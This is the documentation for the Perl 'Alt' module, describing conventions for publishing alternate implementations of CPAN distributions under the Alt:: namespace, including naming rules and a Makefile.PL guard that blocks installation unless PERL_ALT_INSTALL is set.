PERL_ALT_INSTALL=OVERWRITE cpanm Alt::IO::All::MSTROUT
Since you are adding this module, you should add some doc to it explaining your alternate version's improvements.
The Alt:: module can be as simple as this:
package Alt::IO::All::MSTROUT; our $VERSION = '0.01';
- no_index
It is important to use the
no_indexdirective on the modules you are providing an alternates for. This is especially important if you are the author of the original, as PAUSE will reindex CPAN to your Alt- version which defeats the purpose. Even if you are not the same author, it will make your index reports not show failures.
- Versioning
It is important to not declare a
$VERSIONin any of the modules that you are providing alternates for. This will help ensure that your alternate module does not satisfy the version requirements for something that wants the real module.
If you want to depend on the alternate versions, then set the dependency on the
Alt::module.
NOTE: If you provide an alternate Foo::Bar (with no VERSION) it will satisfy the version requirements for someone who requires
Foo::Bar => 0. In a sense, depending on version 0 means that alternates are OK.
usethe Alt
You should add this line to your alternate modules:
use Alt::IO::All::MSTROUT;
That way the Alt:: module gets loaded any time you
use IO::All(with the alternate version installed). This gives debugging clues since the Alt:: module is now in
%INC.
- Other Concerns
If you have em, I(ngy) would like to know them. Discuss on #toolchain on irc.perl.org for now..
AUTHOR
Ingy döt Net <ingy@cpan.org>
See
|
https://metacpan.org/pod/Alt
|
CC-MAIN-2016-44
|
refinedweb
| 447
| 63.49
|
.
Getting the news using The Guardian's API on Windows Phone
The Guardian newspaper provides an open platform API so that the published articles (after 1999) can be accessed and used in any application. This article explains how to get latest news and articles using the API.
Windows Phone 8
Windows Phone 7.5
Introduction
The Guardian API has four building blocks which form the basis of how to fetch published articles.
- Content Search - The basic search based on keywords. Results/News are provided in the form of articles lists.
- Section Search - All the articles published in The Guardian lie under some section. We can choose section(s) under which we would like to do basic content search.
- Tag Search - Articles which are tagged by some keyword can be search by this kind of search operation.
- Item Search - Item search gives the detail information available for a single content.
In this article, we will make use of first three to get news based on various parameters. We will make a panorama page having three portions for the basic search/content search, sections search and tags search. On the basis of these filters, we will open our listing page which will show searched articles. Then we can view the detail of any selected item using Web Browser control.
The screens in this project are as shown below:
Prerequisites
- For this particular article, it is not mandatory to register for an application key for The Guardian API. A key is required in order to get detailed information related to the searched items - it is available from here.
- To use this article, we need to have a reference to The Windows Phone Toolkit which can be installed by NuGet Manager. To do so, in the Solution Explorer | Manage Nuget Packages >> search for wptoolkit and install it.
Note: The Guardian API provides all data free of cost. The detailed amount of data we can fetch depends on whether we are using application key or not. The API does has a limit on API calls per month but if you are willing to have an app based on it, then the limits can be increased for individual publishers.
References Required
Following references to the DLLs are required.
- Microsoft.Phone.Controls.Toolkit
- PhonePerformance
- System.Runtime.Serialization
- System.Servicemodel
- System.Servicemodel.web
UI
- HomePage - A panorama control having three panorama items will be used. In the first one, a text box and couple of date pickers would be placed. Any item can be searched by writing some text only. To reduce the search results, the time intervals can be mentioned. In the second one, a simple list of all the sections available will be placed. On selecting among the items, an icon of tick mark will be visible. In the third and last panorama item, a text box will be placed to search related tags. The successful results will be shown in the list box beneath it.
- CommonList- To make all the lists (tags/sections etc.), we have used User Control defined in this file.
- ArticlesListingPage- In this page, we will show total number of results received and initial 10 results in a list by default. At the bottom of the list, we have an option more, by pressing which next 10 items will be fetched and added in the current list. This process can be repeated itself until all the received results aren't viewed.
- ArticleDetailPage- In this page, we will simply show the detail of any article using a web browser control.
Parsing the JSON response
This section demonstrates how to parse the JSON response received by the content search. Tags and Sections search are parsed similarly (see the attached source code for detail).
Data Structures
When we make a hit for content search, the structure of the response we get starts from the root node named response (declared in ContentMainResponse.cs):
[DataContract]
public class ContentMainResponse
{
[DataMember(Name = "response")]
public ContentResponse Response { get; set; }
}
The ContentResponse used in response (declared in ContentResponse.cs) has setters and getters for the main elements returned by the query (status, number of pages, current page, etc.):
[DataContract]
public class ContentResponse
{
[DataMember(Name = "status")]
public string Status { get; set; }
[DataMember(Name = "userTier")]
public string UserTier { get; set; }
[DataMember(Name = "total")]
public string Total { get; set; }
[DataMember(Name = "startIndex")]
public string StartIndex { get; set; }
[DataMember(Name = "pageSize")]
public string PageSize { get; set; }
[DataMember(Name = "currentPage")]
public string CurrentPage { get; set; }
[DataMember(Name = "pages")]
public string Pages { get; set; }
[DataMember(Name = "orderBy")]
public string OrderBy { get; set; }
[DataMember(Name = "results")]
public List<ContentObject> ContentObjList { get; set; }
}
Note that the results data member is a list of ContentObject which define each individual article (defined in ContentObject.cs):
[DataContract]
public class ContentObject
{
[DataMember(Name = "id")]
public string Id { get; set; }
[DataMember(Name = "sectionId")]
public string SectionId { get; set; }
[DataMember(Name = "sectionName")]
public string SectionName { get; set; }
[DataMember(Name = "webPublicationDate")]
public string WebPublicationDate { get; set; }
[DataMember(Name = "webTitle")]
public string WebTitle { get; set; }
[DataMember(Name = "webUrl")]
public string WebUrl { get; set; }
[DataMember(Name = "apiUrl")]
public string ApiUrl { get; set; }
[DataMember(Name = "fields")]
public ContentThumbnail Fields { get; set; }
}
Last of all, each article (ContentObject) has a thumbnail (ContentThumbnail), which is declared in ContentThumbnail.cs:
[DataContract]
public class ContentThumbnail
{
[DataMember(Name = "thumbnail")]
public string ThumbnailUrl { get; set; }
}
Files Used
All the files used for the different types of web services hits in this app are listed below:
- ContentObject.cs
- ContentResponse.cs
- ContentThumbnail.cs
- SectionMainResponse.cs
- SectionObject.cs
- SectionResponse.cs
- TagObject.cs
- TagsMainResponse.cs
- TagsResponse.cs
API Usage
Sections Search
As soon as the Home page loads, we are fetching the list of all available sections. The code snippet is as below.
public void getSectionsList()
{
HttpWebRequest httpReq = (HttpWebRequest)HttpWebRequest.Create(new Uri(AppConstants.sectionsBaseUri));
httpReq.BeginGetResponse(HTTPWebRequestSectionsCallBack, httpReq);
}
private void HTTPWebRequestSectionsCallBackeSectionsResponseData(strResponse);
}
});
}
catch
{ }
}
After receiving and saving the Section's data we have to parse it. After parsing Sections data, we are setting it to the target list box. On tapping the sections, we need to save their texts as multiple sections names can be used to search any content on The Guardian. If we want to search some text based on section 1 or section 2 then we have to bind them and send in our web request as section 1 | section 2. The code snippet of sections list box selection is as shown below:
private void sectionsList_SelectionChanged(object sender, SelectionChangedEventArgs e)
{
if (sectionsList != null && sectionsList.SelectedIndex >= 0)
{
CommonList data = (sender as ListBox).SelectedItem as CommonList;
int listSelIndex = sectionsList.SelectedIndex;
Boolean flagIsAlreadySelected = false;
// if index is already selected, then deselect it
for (int i = 0; i < _prevSelSectionIndexArr.Count; i++)
{
if (listSelIndex == _prevSelSectionIndexArr.ElementAt(i))
{
_prevSelSectionIndexArr.RemoveAt(i);
_sectionIdsArrToBeSearchIn.RemoveAt(i);
data.imgSectionTickIcon.Visibility = System.Windows.Visibility.Collapsed;
flagIsAlreadySelected = true;
break;
}
}
// if not selected earlier then select it
if (!flagIsAlreadySelected)
{
flagIsAlreadySelected = false;
data.imgSectionTickIcon.Visibility = System.Windows.Visibility.Visible;
_prevSelSectionIndexArr.Add(listSelIndex);
_sectionIdsArrToBeSearchIn.Add(data.txtSectionId.Text.Trim());
}
sectionsList.SelectedIndex = -1; //resetting index to -1
}
}
Above, we are just checking if the item is already selected. If yes, it is deselected else selected and it's value is saved in a String type array.
Tags Search
To get desired tags, we had created a text box and a search button. On tapping the search button, tag search will start. The code snippet is shown below:
public void getTagsList(String aKeyword, int aPageNumber)
{
HttpWebRequest httpReq = (HttpWebRequest)HttpWebRequest.Create(new Uri(AppConstants.tagsBaseUri + "q=" + aKeyword + "&page=" + aPageNumber));
httpReq.BeginGetResponse(HTTPWebRequestTagsCallBack, httpReq);
}
private void HTTPWebRequestTagsCallBackeTagsResponseData(strResponse);
}
});
}
catch
{ }
}
By default 10 initial results will be shown. The facility to view More items is also available in this list. The code snippet is as below.
private void lst_tagsResult_SelectionChanged(object sender, SelectionChangedEventArgs e)
{
CommonList data = (sender as ListBox).SelectedItem as CommonList;
if (lst_tagsResult != null && lst_tagsResult.SelectedIndex >= 0)
{
try
{
if (data.txtTagWebTitle.Text.Contains("more"))
{
int tagsListSelIndex = lst_tagsResult.SelectedIndex;
try
{
_tagsResultList.RemoveAt(tagsListSelIndex);
}
catch
{ }
getTagsList(_aTagWordToSearch, ++_aTagsPageNumber);
}
else
{
int listSelIndex = lst_tagsResult.SelectedIndex;
Boolean flagIsAlreadySelected = false;
// if index is already selected, then deselect it
for (int i = 0; i < _prevSelTagsIndexArr.Count; i++)
{
if (listSelIndex == _prevSelTagsIndexArr.ElementAt(i))
{
_prevSelTagsIndexArr.RemoveAt(i);
_tagsIdsArrToBeSearchIn.RemoveAt(i);
data.imgTagTickIcon.Visibility = System.Windows.Visibility.Collapsed;
flagIsAlreadySelected = true;
break;
}
}
// if not selected earlier then select it
if (!flagIsAlreadySelected)
{
flagIsAlreadySelected = false;
data.imgTagTickIcon.Visibility = System.Windows.Visibility.Visible;
_prevSelTagsIndexArr.Add(listSelIndex);
_tagsIdsArrToBeSearchIn.Add(data.txtTagId.Text.Trim());
}
lst_tagsResult.SelectedIndex = -1; //resetting index to -1
}
}
catch
{ }
}
}
Now the code of panorama item 2 and 3 is explained. We will now move to panorama item 1. Here, we can select the time duration to filter down our search results. The code snippet is shown below.
private void datePicker_To_ValueChanged(object sender, DateTimeValueChangedEventArgs e)
{
if (e.NewDateTime != null)
{
DateTime dateTo = (DateTime)e.NewDateTime;
DateTimeOffset dateOffset = new DateTimeOffset(dateTo,
TimeZoneInfo.Local.GetUtcOffset(dateTo));
_searchToDate = dateTo.ToString("o") + "\n";
_searchToDate = dateOffset.ToString("o") + "\n";
_searchToDate = trimDateFromDateTime(_searchToDate);
}
}
private void datePicker_From_ValueChanged(object sender, DateTimeValueChangedEventArgs e)
{
if (e.NewDateTime != null)
{
DateTime dateFrom = (DateTime)e.NewDateTime;
DateTimeOffset dateOffset = new DateTimeOffset(dateFrom,
TimeZoneInfo.Local.GetUtcOffset(dateFrom));
_searchFromDate = dateFrom.ToString("o") + "\n";
_searchFromDate = dateOffset.ToString("o") + "\n";
_searchFromDate = trimDateFromDateTime(_searchFromDate);
}
}
private String trimDateFromDateTime(String aFullDate)
{
String resultantString = null;
try
{
int posSpace = aFullDate.IndexOf('T');
resultantString = aFullDate.Substring(0, posSpace);
}
catch (Exception e)
{
}
return resultantString;
}
On tapping the search button on the first panorama item, we are redirecting to the ArticlesListingPage by supplying the required values. The Content Search server hit will be made on that page.
Content Search
We can request for the content search by passing some parameters like keyword to be search, page number, section name, tag name, time duration etc.
public void getArticlesContents(String aKeyword, int aPageNumber)
{
HttpWebRequest httpReq = (HttpWebRequest)HttpWebRequest.Create(new Uri(AppConstants.searchBaseUri + "q=" + aKeyword + "&page=" + aPageNumber +
"&from-date=" + _searchFromDate + "&to-date=" + _searchToDate + "&format=" + "json" + "&show-fields=thumbnail" + "§ion=" + _sectionNameToBeSearchIn +
"&tag=" + _tagNameToBeSearchIn));
httpReq.BeginGetResponse(HTTPWebRequestCallBack, httpReq);
}
In the callback, the response is saved and parsed.
In the OnNavigatedTo(), we are saving the received values from the previous page and making the server request to search the articles based on our criteria. After receiving the successful response the response needs to be parsed.
In this search list, 10 items will be visible by default. To view rest of the items, more option is available here as well. By tapping more option, new server request will be made which will fetch next 10 items. On tapping other than the item having more option, the detail page will be opened showing the article's detail in a web browser.
Build and Run
Now you may build the app and try to run it.
Summary
This way we can get latest news in the form of articles from The Guardian's site using its API.
Croozeus - Nice app
Hi Vaishali,
This looks like a useful application...
May be you could trim down the code snippets to whatever you want to highlight with this article. For example, if you want to illustrate how to use the Guardian API, focus on it.. May be show a sample JSON response that you get from the API... and as you've already done show functions to parse the response... It's not necessary to focus on the UI in this case, however you can still show screenshots and your attached code snippet can contain all code.
The upshot is that for big projects like this, all code (XAML and cs) need not be highlighted in the article... just focus the part that you wish the article to cover. If there are multiple key aspects you want to cover, the right approach may be to have 2 or 3 small articles.
Regards,
PankajPS: Are you going to publish this application to the marketplace? Are you going to maintain it for future updates? If yes, may be you should also have it on projects.developer.nokia.com.. you may find good collaborators.
croozeus 09:10, 13 May 2013 (EEST)
Vaishali Rawat - Thanks for Feedback
Hi Pankaj,
Thanks very much for your encouraging words.
I will try to reduce the code available in the article by omitting the least useful one.
Yes, I am looking forward to make an app on it. About uploading it on Forum Nokia Projects... I am not pretty sure.
Best Regards,Vaishali
Vaishali Rawat 14:34, 15 May 2013 (EEST)
Hamishwillee - Agree with Pankaj
Hi Vaishali
The choice of article is good, and the code looks great. I would certainly consider making it a ND Project so you can extend it easily and get more people on board - that is of course up to you.
The main point that Pankaj is making is that as written this isn't very useful because it is impossible to tell what is important and relevant. A developer can look at the code because you've provided the zip. Having so much code here is just unreadable.
I strongly urge you to take his suggestion. Cover things like what APIs you use to access the service - were they native or third party? Were there any tricks to the JSON parsing. Can the API supply XML as well? Were there any tricks/tips you discovered while writing this - for example did data come in an unexpected format you had to convert. Perhaps something on caching the results (should you wish to) for faster loading. All the stuff that others can learn from if they want to use this API or a similar one.
So your article is about using the service and what it offers - that is something others can learn from, while your app is code that people can inspect for the detail.
I would imagine your article would shrink to about 1/4 the size.
Hope that makes sense.
RegardsHamish
hamishwillee 04:38, 16 May 2013 (EEST)
Vaishali Rawat - I Agree
Hey Hamish,
Thank you for appreciating the article.
I agree that the code in this article is too much. While uploading it, i was having this feeling but didn't omit anything as I didn't wanted to miss any detail. Anyway, I will definitely reduce the code written here. Will also mention the minor details you suggested.
Just give me some time.
BR,Vaishali
Vaishali Rawat 15:29, 16 May 2013 (EEST)
Hamishwillee - Of course!
Take your time. Sorry to dump so many reviews on you all at onceAnd of course thank you again, these are still OK articles, just not as great as you are capable of.
hamishwillee 08:42, 17 May 2013 (EEST)
Vaishali Rawat - Code reduced
Hey Hamish | Pankaj,
I have reduced the code written in the article. Tried to include important information only. You may have a look at it now.
BR,Vaishali
Vaishali Rawat 21:26, 21 May 2013 (EEST)
Hamishwillee - Looks a lot more clear to me
Hi Vaishali
Thank you. There is a lot less code now, which is good. Now you've removed the code you perhaps need to say a bit more about what you have left.
So you have lots of text "This file has following declaration." - why is this code interesting? This isn't the whole file which is good, but its not obvious what it shows and why. I think part of the problem is that this is still "file centric".
Frankly as a reader I'm interested in "Hows" and "Why" - the file that information in is important, but its not the heading. So without delving too deeply I look at this and I see that your code does interesting things like get and send responses, as part of that it creates classes that have setters and getters for the main objects you're working with. These classes then interact with the service. All that stuff is what is interesting and will help people understand what they need to do.
So my headings would be something like (and remembering I haven't read this in enough detail to know how it works!):
Looking at your code HomePage.cs section is closest to what I want, though you'd again have a title which explains what you're doing, not where you're doing it.
Hope that makes sense. It is more understandable now, just not as good as it could be.
RegardsH
hamishwillee 04:58, 22 May 2013 (EEST)
Pooja 1650 - Just got in!
Hi Vaishali | Hamish,
Sorry to step in all of a sudden. But just made a couple of changes like divided the code behind section into two parts: Sample JSON parsing and App Logic Handling. So anybody interested to know JSON parsing can check the first section, else can skip.
Please let me know if it's fine.
Thanks,Pooja
pooja_1650 15:24, 22 May 2013 (EEST)
Vaishali Rawat - Further Edited
Dear Hamish,
The article is further edited. Removed the references of individual pages, rather referred directly to search types like tags search, content search etc.
Hope it's better now.
Regards,Vaishali
Vaishali Rawat 20:49, 22 May 2013 (EEST)
Vaishali Rawat - @Pooja
Hey Pooja,
Thanks for the changes. I think they are fine.
Regards,Vaishali
Vaishali Rawat 20:51, 22 May 2013 (EEST)
Vaishali Rawat - @Hamish
Hey Hamish,
Forgot to mention in last comment that I have kept an example of showcasing JSON parsing. If you think it's not useful then I can omit it. I thought, if not for all search types, I can show way to parse data atleast for one kind of search response.
Regards,Vaishali
Vaishali Rawat 21:05, 22 May 2013 (EEST)
Hamishwillee - Much better
Hi Vaishali/Pooja
Thanks for this. I think this is much better.
The section on parsing the response was still "file centric" so I have re-written it. Please check it out above. As you can see by removing the filenames as headings I'm now in a position where I describe what the code is doing/for, not what is in each file. As a rule it is rarely a good idea to have filenames as heading.
Now that I've done that its a bit obvious that this section is "dangling" ie it starts from "The root node of a response is a single tag named response " but it is not clear where this tag is used and how it gets populated and how this then gets into the UI. I see further down you have "strResponse" - is this an object of type response?
It might be that we want to shift this around so that we JUST cover end-to-end "content search". So you'd have UI, then the section on making the request using content search, then this section I've just made on getting the data into the data object, (and explain how that gets back into the UI breifly). The sections on tag search etc might be kept for the end as an "aside".
Does what I've done and I'm proposing make sense? The whole idea is that someone can understand end to end what needs to be done to create this type of service as well as this service.
Thoughts?
RegardsH
hamishwillee 05:29, 23 May 2013 (EEST)
Vaishali Rawat - Thanks for editings
Hi Hamish,
Your changes in JSON Response looks pretty good. Now it's more understandable.
>The root node of a response is a single tag named response " but it is not clear where this tag is used and how it gets populated and how this then gets into the UI. The tag with the name response is the part of the response we get by making content search API hit. I had tried to explain it in that section now.
> I see further down you have "strResponse" - is this an object of type response? It's a String type object, already declared above. Guess you missed it!
> how the response then gets into the UI. I had previously showed the code by which I was mapping my response with the UI, but removed it later on as less code was required. I thought readers can check it in attached zip.
>Does what I've done and I'm proposing make sense? The whole idea is that someone can understand end to end what needs to be done to create this type of service as well as this service I liked the idea a lot and it does makes sense too. Now by checking only the metadata section, one can directly jump to either of the search type (e.g). Writing the whole code into article was a mistake, will definitely take care of it in future.
I like the current structure, content and the length of the article.
Thanks very much for all the hard work.
Regards,Vaishali
Vaishali Rawat 21:00, 23 May 2013 (EEST)
Hamishwillee - OK, your call.
Yes, overall its a much better document than originally. Thanks!
RegardsHamish
hamishwillee 04:38, 24 May 2013 (EEST)
Vaishali Rawat - Missed something
Hi Hamish,
I am sorry but I completely didn't understood your thoughts last time. So, you want the article to cover content search (start to end) completely? Tags search and Sections Search can be explained briefly?
Sounds good. We can definitely do this. Let me know If you want to see the article in such a way, I will edit.
Regards,Vaishali
Vaishali Rawat 15:24, 24 May 2013 (EEST)
Hamishwillee - What I want you to do
Hi Vaishali
What I "want you to do" has to be balance with whether YOU think the suggestion is a good one/worth the additional effort.
I think it is good to have an article which explained from end to end how to do the content search, and just the highlights of the other two would be a good way of presenting this. So you'd start with this is how I make the request, this is the object I get back, this is how I get it into the UI, these are the minor differences for tag and sections search.
At the moment all the information is there, but there isn't much logical flow - for example the UI is before the code to represent the returned request, which is before the code which makes the request.
Anyway, you decide if you think this might be better!
RegardsHamish
hamishwillee 10:20, 27 May 2013 (EEST)
|
http://developer.nokia.com/community/wiki/Getting_the_news_using_The_Guardian%27s_API_on_Windows_Phone
|
CC-MAIN-2015-14
|
refinedweb
| 3,703
| 64.3
|
Developing A Spring Boot Application for Kubernetes Cluster: A Tutorial [Part 1]
The first part of this tutorial will show you how to install and configure Docker and the master and worker nodes your Spring app will need.
Join the DZone community and get the full member experience.Join For Free
This article is part 1 of a series of four subsequent articles. Check out part 2, part 3, and part 4 here.
Introduction
One of my recent projects involved deploying a Spring Boot application into a Kubernetes cluster in the Amazon Elastic Compute Cloud (Amazon EC2) infrastructure. Although individual components of the overall technology stack have been well-documented, I thought it would still be useful to describe the particular installation and configuration steps. Hence, this article will discuss the following:
Creating a Kubernetes cluster in the Amazon EC2 environment.
Developing a sample Spring Boot application and storing it in a private Docker repository.
Deploying the application into the cluster by fetching it from the private Docker repository.
The Amazon EC2 environment discussed in this article involves only free tier servers. Thus, interested readers can sign up for AWS Free Tier and develop their own project following this tutorial without expensive hardware/software.
This article is organized as follows. The next section gives a quick overview of the Kubernetes framework. The following section discusses the high-level architecture of the project. The subsequent sections describe detailed steps to complete our project, in particular:
Configuring and launching virtual servers for individual nodes in the cluster.
Installing Docker, Kubelet, Kubeadm, Kubectl in each node.
Configuring master node and worker nodes.
Installing Flannel as a network pod for the cluster.
Developing a sample Spring Boot application for deployment into the cluster.
Building and deploying the sample Spring application into a private Docker repository at hub.docker.com.
Creating a secret key in the master node to access the Docker repository.
Fetching individual components of the application from the Docker repository and deploying them into the corresponding nodes in the cluster.
Creating the cluster services to access the application.
The last section will give concluding remarks.
Background
Kubernetes is an open-source platform to support deployment, management, and scaling of container-based applications. Kubernetes is compatible with various container runtimes, such as Docker. A pod in Kubernetes represents one or more containerized applications that run together for a specific business purpose. A node is a machine where one or more pods are deployed. For example, in Amazon EC2 environment a virtual server instance created from an Ubuntu server image can be viewed as a node. A service brings together one or more pods to represent a multi-tier application with an IP address, DNS name, and load-balanced access to pods encapsulated by the service.
A Kubernetes cluster consists of multiple nodes hosting one or more services. Components in a Kubernetes cluster can be divided into two groups: those that manage each individual node and those that manage the cluster itself. The components in the latter group are also known to be part of the control plane and they execute in a master node of the cluster. The components in the control plane manage configuration data of the cluster, provide access to the configuration data via an API server, furnish scheduling of pods across nodes depending on workload demands, and arrange various controller services for different types of resources. There is at least one master node in a cluster. Components that manage each individual node deal with state management for the pods, node resource usage and performance monitoring, load-balancing and network proxy tasks, and container management.
Some additional definitions are listed below.
kubeadm: A software tool that can be used to create and manage a Kubernetes cluster.
kubelet: A software agent that runs in each cluster node, mainly responsible for managing containers inside pods.
kubectl: A command-line tool to create and manage various entities in a cluster including pods and services.
Flannel: A cluster plug-in used to deliver IPv4 addressing, routing and network control between the nodes in a cluster.
For a high-level overview of Kubernetes concepts, a good starting point is the Kubernetes Wikipedia page. For a deeper dive, start here.
Architecture
The below diagram outlines the architecture discussed in this article. The Kubernetes cluster in the Amazon EC2 environment consists of one master and 4 worker nodes. The sample Spring Boot application is composed of a web layer and a service layer. Each of those is a separate Spring Boot application built, deployed and configured separately. For high availability, each of the web and service layers is deployed into two distinct worker nodes, Web-1, Web-2 for the web layer and Service-1, Service-2 for the service layer. The single master node is responsible for cluster configuration and administration. The Spring Boot application is stored and fetched from the private repository in Docker Hub.
The following software versions will be used.
Ubuntu: 16.04.4 LTS
Kubectl: 1.11.1
Kubeadm: 1.11.1
Kubernetes: 1.11.1
Flannel: v0.10.0-amd64
Docker: 17.03.2-ce
Spring Boot: 2.0.1
Spring Cloud: Finchley Release
Java: openjdk-8
Preparing The Amazon EC2 Environment
As mentioned previously, the project discussed here involves only Amazon EC2 free tier servers. Referring to the architecture diagram above, we need to create a total of 6 instances, one master node, 4 worker nodes, and one outside node to test access to cluster from outside. Each node will utilize the Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image. That is a server with a single virtual CPU and 1 GB memory, below the recommended benchmark to install Kubernetes in a production environment, but still sufficient for the project in this article.
Let us start with the master node. In the Amazon EC2 console, launch an instance selecting Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image. Accept defaults and create a new key pair when prompted (or use an existing key pair if you already have one).
After the instance starts, click on "Security groups launch-wizard-XX" as shown below.
In the Inbound tab, add custom TCP and UDP rules to allow inbound traffic in 0-65535 port range for all sources. Hence, inbound rules will look like below.
(In any real application the allowable port range will be much narrower.)
For outbound traffic, no change needs to be made. By default, all outbound traffic is allowed.
Installation and configuration steps for the master node are broken into two groups, "Worker Node Steps" and "Additional Steps for Master." As the name implies, "Worker Node Steps" will be executed for each worker node. For the master node, after executing "Worker Node Steps" follow "Additional Steps for Master."
Worker Node Steps
Connect to the instance, worker or master, depending on the particular scenario (use the key pair created and chosen while launching the instance). Become root with the command
sudo su - . Commands indicated below should be executed in sequence.
We start by installing Docker.}')
We continue with installing kubeadm, kubelet and kubectl. sysctl net.bridge.bridge-nf-call-iptables=1 systemctl daemon-reload systemctl restart kubelet
Additional Steps for Master
Connect to the instance for master node (use the key pair created and chosen while launching the instance). Become root via
sudo su - . Execute the following.
apt-get update && apt-get upgrade kubeadm init --pod-network-cidr=10.244.0.0/16
This last command will take a while to execute. At the end, you should see something like this:
....22.14:6443 --token mkae5q.j5mudz8g9e1xgc5u --discovery-token-ca-cert-hash sha256:dbddef4f66cf01e25f6aa39b30172e84c43f2990a4ebcd8b94600a5837de1d75
Jot down the command that starts with
kubeadm join which will be needed by worker nodes to join the cluster later on.
Continue the configuration of the master node by executing the following three commands.
mkdir -p $HOME/.kube sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config sudo chown $(id -u):$(id -g) $HOME/.kube/config
At this point, if you execute
systemctl status kubelet --full --no-pager
you should see something like this: Fri 2018-07-27 14:30:39 UTC; 2h 25min ago ...
The only remaining step in installing and configuring the master node is the installation of a pod network. For our purposes, we will utilize Flannel. To install Flannel, execute
kubectl apply -f
Then, executing
kubectl get services --all-namespaces -o wide
should display
NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR default kubernetes ClusterIP 10.96.0.1 <none> 443/TCP 2m <none> kube-system kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP 2m k8s-app=kube-dns
The service named kube-dns with IP address 10.96.0.10 provides DNS service for the cluster. We will utilize that service later on.
At this point, the installation and configuration of the master node has been completed. We now have a cluster that consists of a single master node. The next steps involve adding worker nodes to cluster.
Install and Configure Worker Nodes
For each of the 4 worker nodes repeat the following.
Launch an instance selecting Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image.
Configure the corresponding security group by adding custom TCP and UDP rules to allow inbound traffic in 0-65535 port range for all sources.
Execute the steps in 'Worker Node Steps'.
Execute the
kubeadm joincommand previously displayed in the master node in response to
kubeadm initcommand. For example,
kubeadm join 172.31.17.161:6443 --token nznjj2.nr2hqpunalqqwnem --discovery-token-ca-cert-hash sha256:19d6a42e17c43efb47aa78609dc0acf9b01db6011c5d64efee8c8c71b52d06d4
Via the above steps, you have installed and configured the worker node. You have also joined the worker node to the cluster.
Check the Running of the Cluster
Once you complete the steps for all worker nodes to connect to the cluster, in master node become root via
sudo su - and execute
kubectl get nodes . You should see something like this:
NAME STATUS ROLES AGE VERSION ip-172-31-16-16 Ready <none> 8m v1.11.1 ip-172-31-22-14 Ready master 23h v1.11.1 ip-172-31-33-22 Ready <none> 2m v1.11.1 ip-172-31-35-232 Ready <none> 29s v1.11.1 ip-172-31-42-220 Ready <none> 5m v1.11.1
At this point, we have fully configured cluster consisting of one master and 4 worker nodes.
Create Outside Node
In reference to the architecture diagram above, we also need a node outside the cluster to test cluster access from outside. To create that node:
Launch an instance selecting Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image.
Configure the corresponding security group by adding custom TCP and UDP rules to allow inbound traffic in 0-65535 port range for all sources.
No additional steps are necessary.
View Instances in Amazon EC2 Console
In my console, I entered a name for each node under the Name column. The worker nodes were named Web-1, Web-2, Service-1, Service-2, the master node was named Master, and the outside node was named OutsideNode. It looks like below.
Look for part 2 of this tutorial!
Opinions expressed by DZone contributors are their own.
|
https://dzone.com/articles/developing-a-spring-boot-application-for-kubernete-1
|
CC-MAIN-2021-39
|
refinedweb
| 1,871
| 58.08
|
This week’s EAP brings you a pack of important bug fixes and improvements in all areas, along with several of new features:
- PHPUnit fast switch between test/source is now available, under Navigate|Test. It will prompt for Generate Test if none found. Also test generation is improved
- Code Folding state is preserved across restarts and through refactoring for all languages. We might still have some glitches, please report them separately
- Scopes are now easily editable through main Settings
More details available in build.
Those who love to use Code Folding can vote for this:
As long as we are pitching folding improvements, I really think the idea of better keyboard control of the folding level like outliners have would be very, very useful –
I noticed serious UTF-8 encoding problem, try write some specific chars like “ěščřžýáíé” to UTF-8 encoded file, save it and open in previous EAP (or another UTF-8 compatible editor…)
BUG or problem with my environment?
Works for me. Please elaborate – you mentioned about an encoding problem, but didn’t describe the problem. Thanks!
I try it again with invalidating caches and it works for now… In first try editor saved non-UTF characters into file.
Thanks! Please let us know if you will meet the issue again.
This build is really messed up, cannot develop at all, random errors thrown right and left, I’d advise skipping this EAP.
Can’t agree. Seems works faster (if it’s not my mistake) and more stable.
Got to agree with raveren on this one.
open a project, then open an existing project in ‘New Window’
Caused crazyness for me. no editor, restart didnt help, text typing the error dissappearing while typing. Im back on the previous EAP now.
Hmm, worked ok whole yesterday for me. Win x64. Maybe it is OS related issue?
Any word on when round-trip engineering will be available? I see the UML diagrams are here but adding and methods in the diagram is not supported and neither is adding properties a.k.a. fields. Just curious.
=)
Well the diagram-suitable operations already work – i.e. Rename plus editing of hierarchy arrows is reflected in code (extends/implements clauses).
We plan to add more supported contexts and more suitable refactorings.
Also watch
“Exclude Folders” feature still doesn’t work properly when load current project, return to 110.226 again.
Please describe the bug, or better create an issue here.
Well, bug is simple but critical (and it appeared in previous EAP). When I open PHPStorm and it begin scanned my current project (I use tmpfs partiton for such data so it scanned very often), I can watch which folders are scanned and there are some (not all) folders marked as excluded in settings. I have heavy Zend Framework project with tricky PHP code in some 3rd party plugins (100% #$&#$%# “Indian code”) so I excluded them always, cos brave PhpStorm just cant index them – it hangs with 12 Gb RAM and quad-core Athlon.
110.226 is last EAP without this bug (and I never met it early).
Please submit an issue and provide all details there. Thanks!
Any information when symfony support will be available? on 3.0, 3.x, 4.0, etc?
Please watch – WI-241
Is it possible to generate a project-wide (or scope) UML diagram of classes?
At the moment the only way to show several classes on the same diagram is to show diagram for some class and then add other classes manually using ”Add Class to Diagram’ action. Please submit an issue. Thanks!
Now you can drag and drop files to diagram. We’ll also about to enable “create diagram” on any folder – including project root. Later after adding namespaces view – on any namespace.
YEs! Can’t wait
I have a problem with Mercurial in WebStorm 110.359.
Description:
All my files have UTF-8 encoding.
When I change any file, after commit to repository, all lines with non-ASCII symbols are marked as changed. IDE offers me to roll them back. If I try to do that, line appears as “mojibakes”.
Screenshot with problem
Is it IDE problem or problem of my environment?
Thanks for the issue!
|
http://blog.jetbrains.com/webide/2011/11/phpstorm-webstorm-3-0-eap-110-359/
|
CC-MAIN-2015-32
|
refinedweb
| 704
| 72.46
|
C library GR¶
Installation¶
You can manually install prebuilt binaries for the GR runtime or install a Linux package.
yum install libXt libXrender libXext Mesa-libGL qt-x11
Note: The CentOS 6 build can be used for other Linux distributions and relies on Qt 4 for the
gksqtapplication, so you may need to install X11, OpenGL and Qt 4 packages specific to your system.
For other versions of GR, see the downloads. X, GLX or OpenGL is not available, GR3 will fall back to a built-in software renderer which implements all GR3 functionality except for volume rendering. If you are using a headless sytem, e.g. a Docker container, and want to use
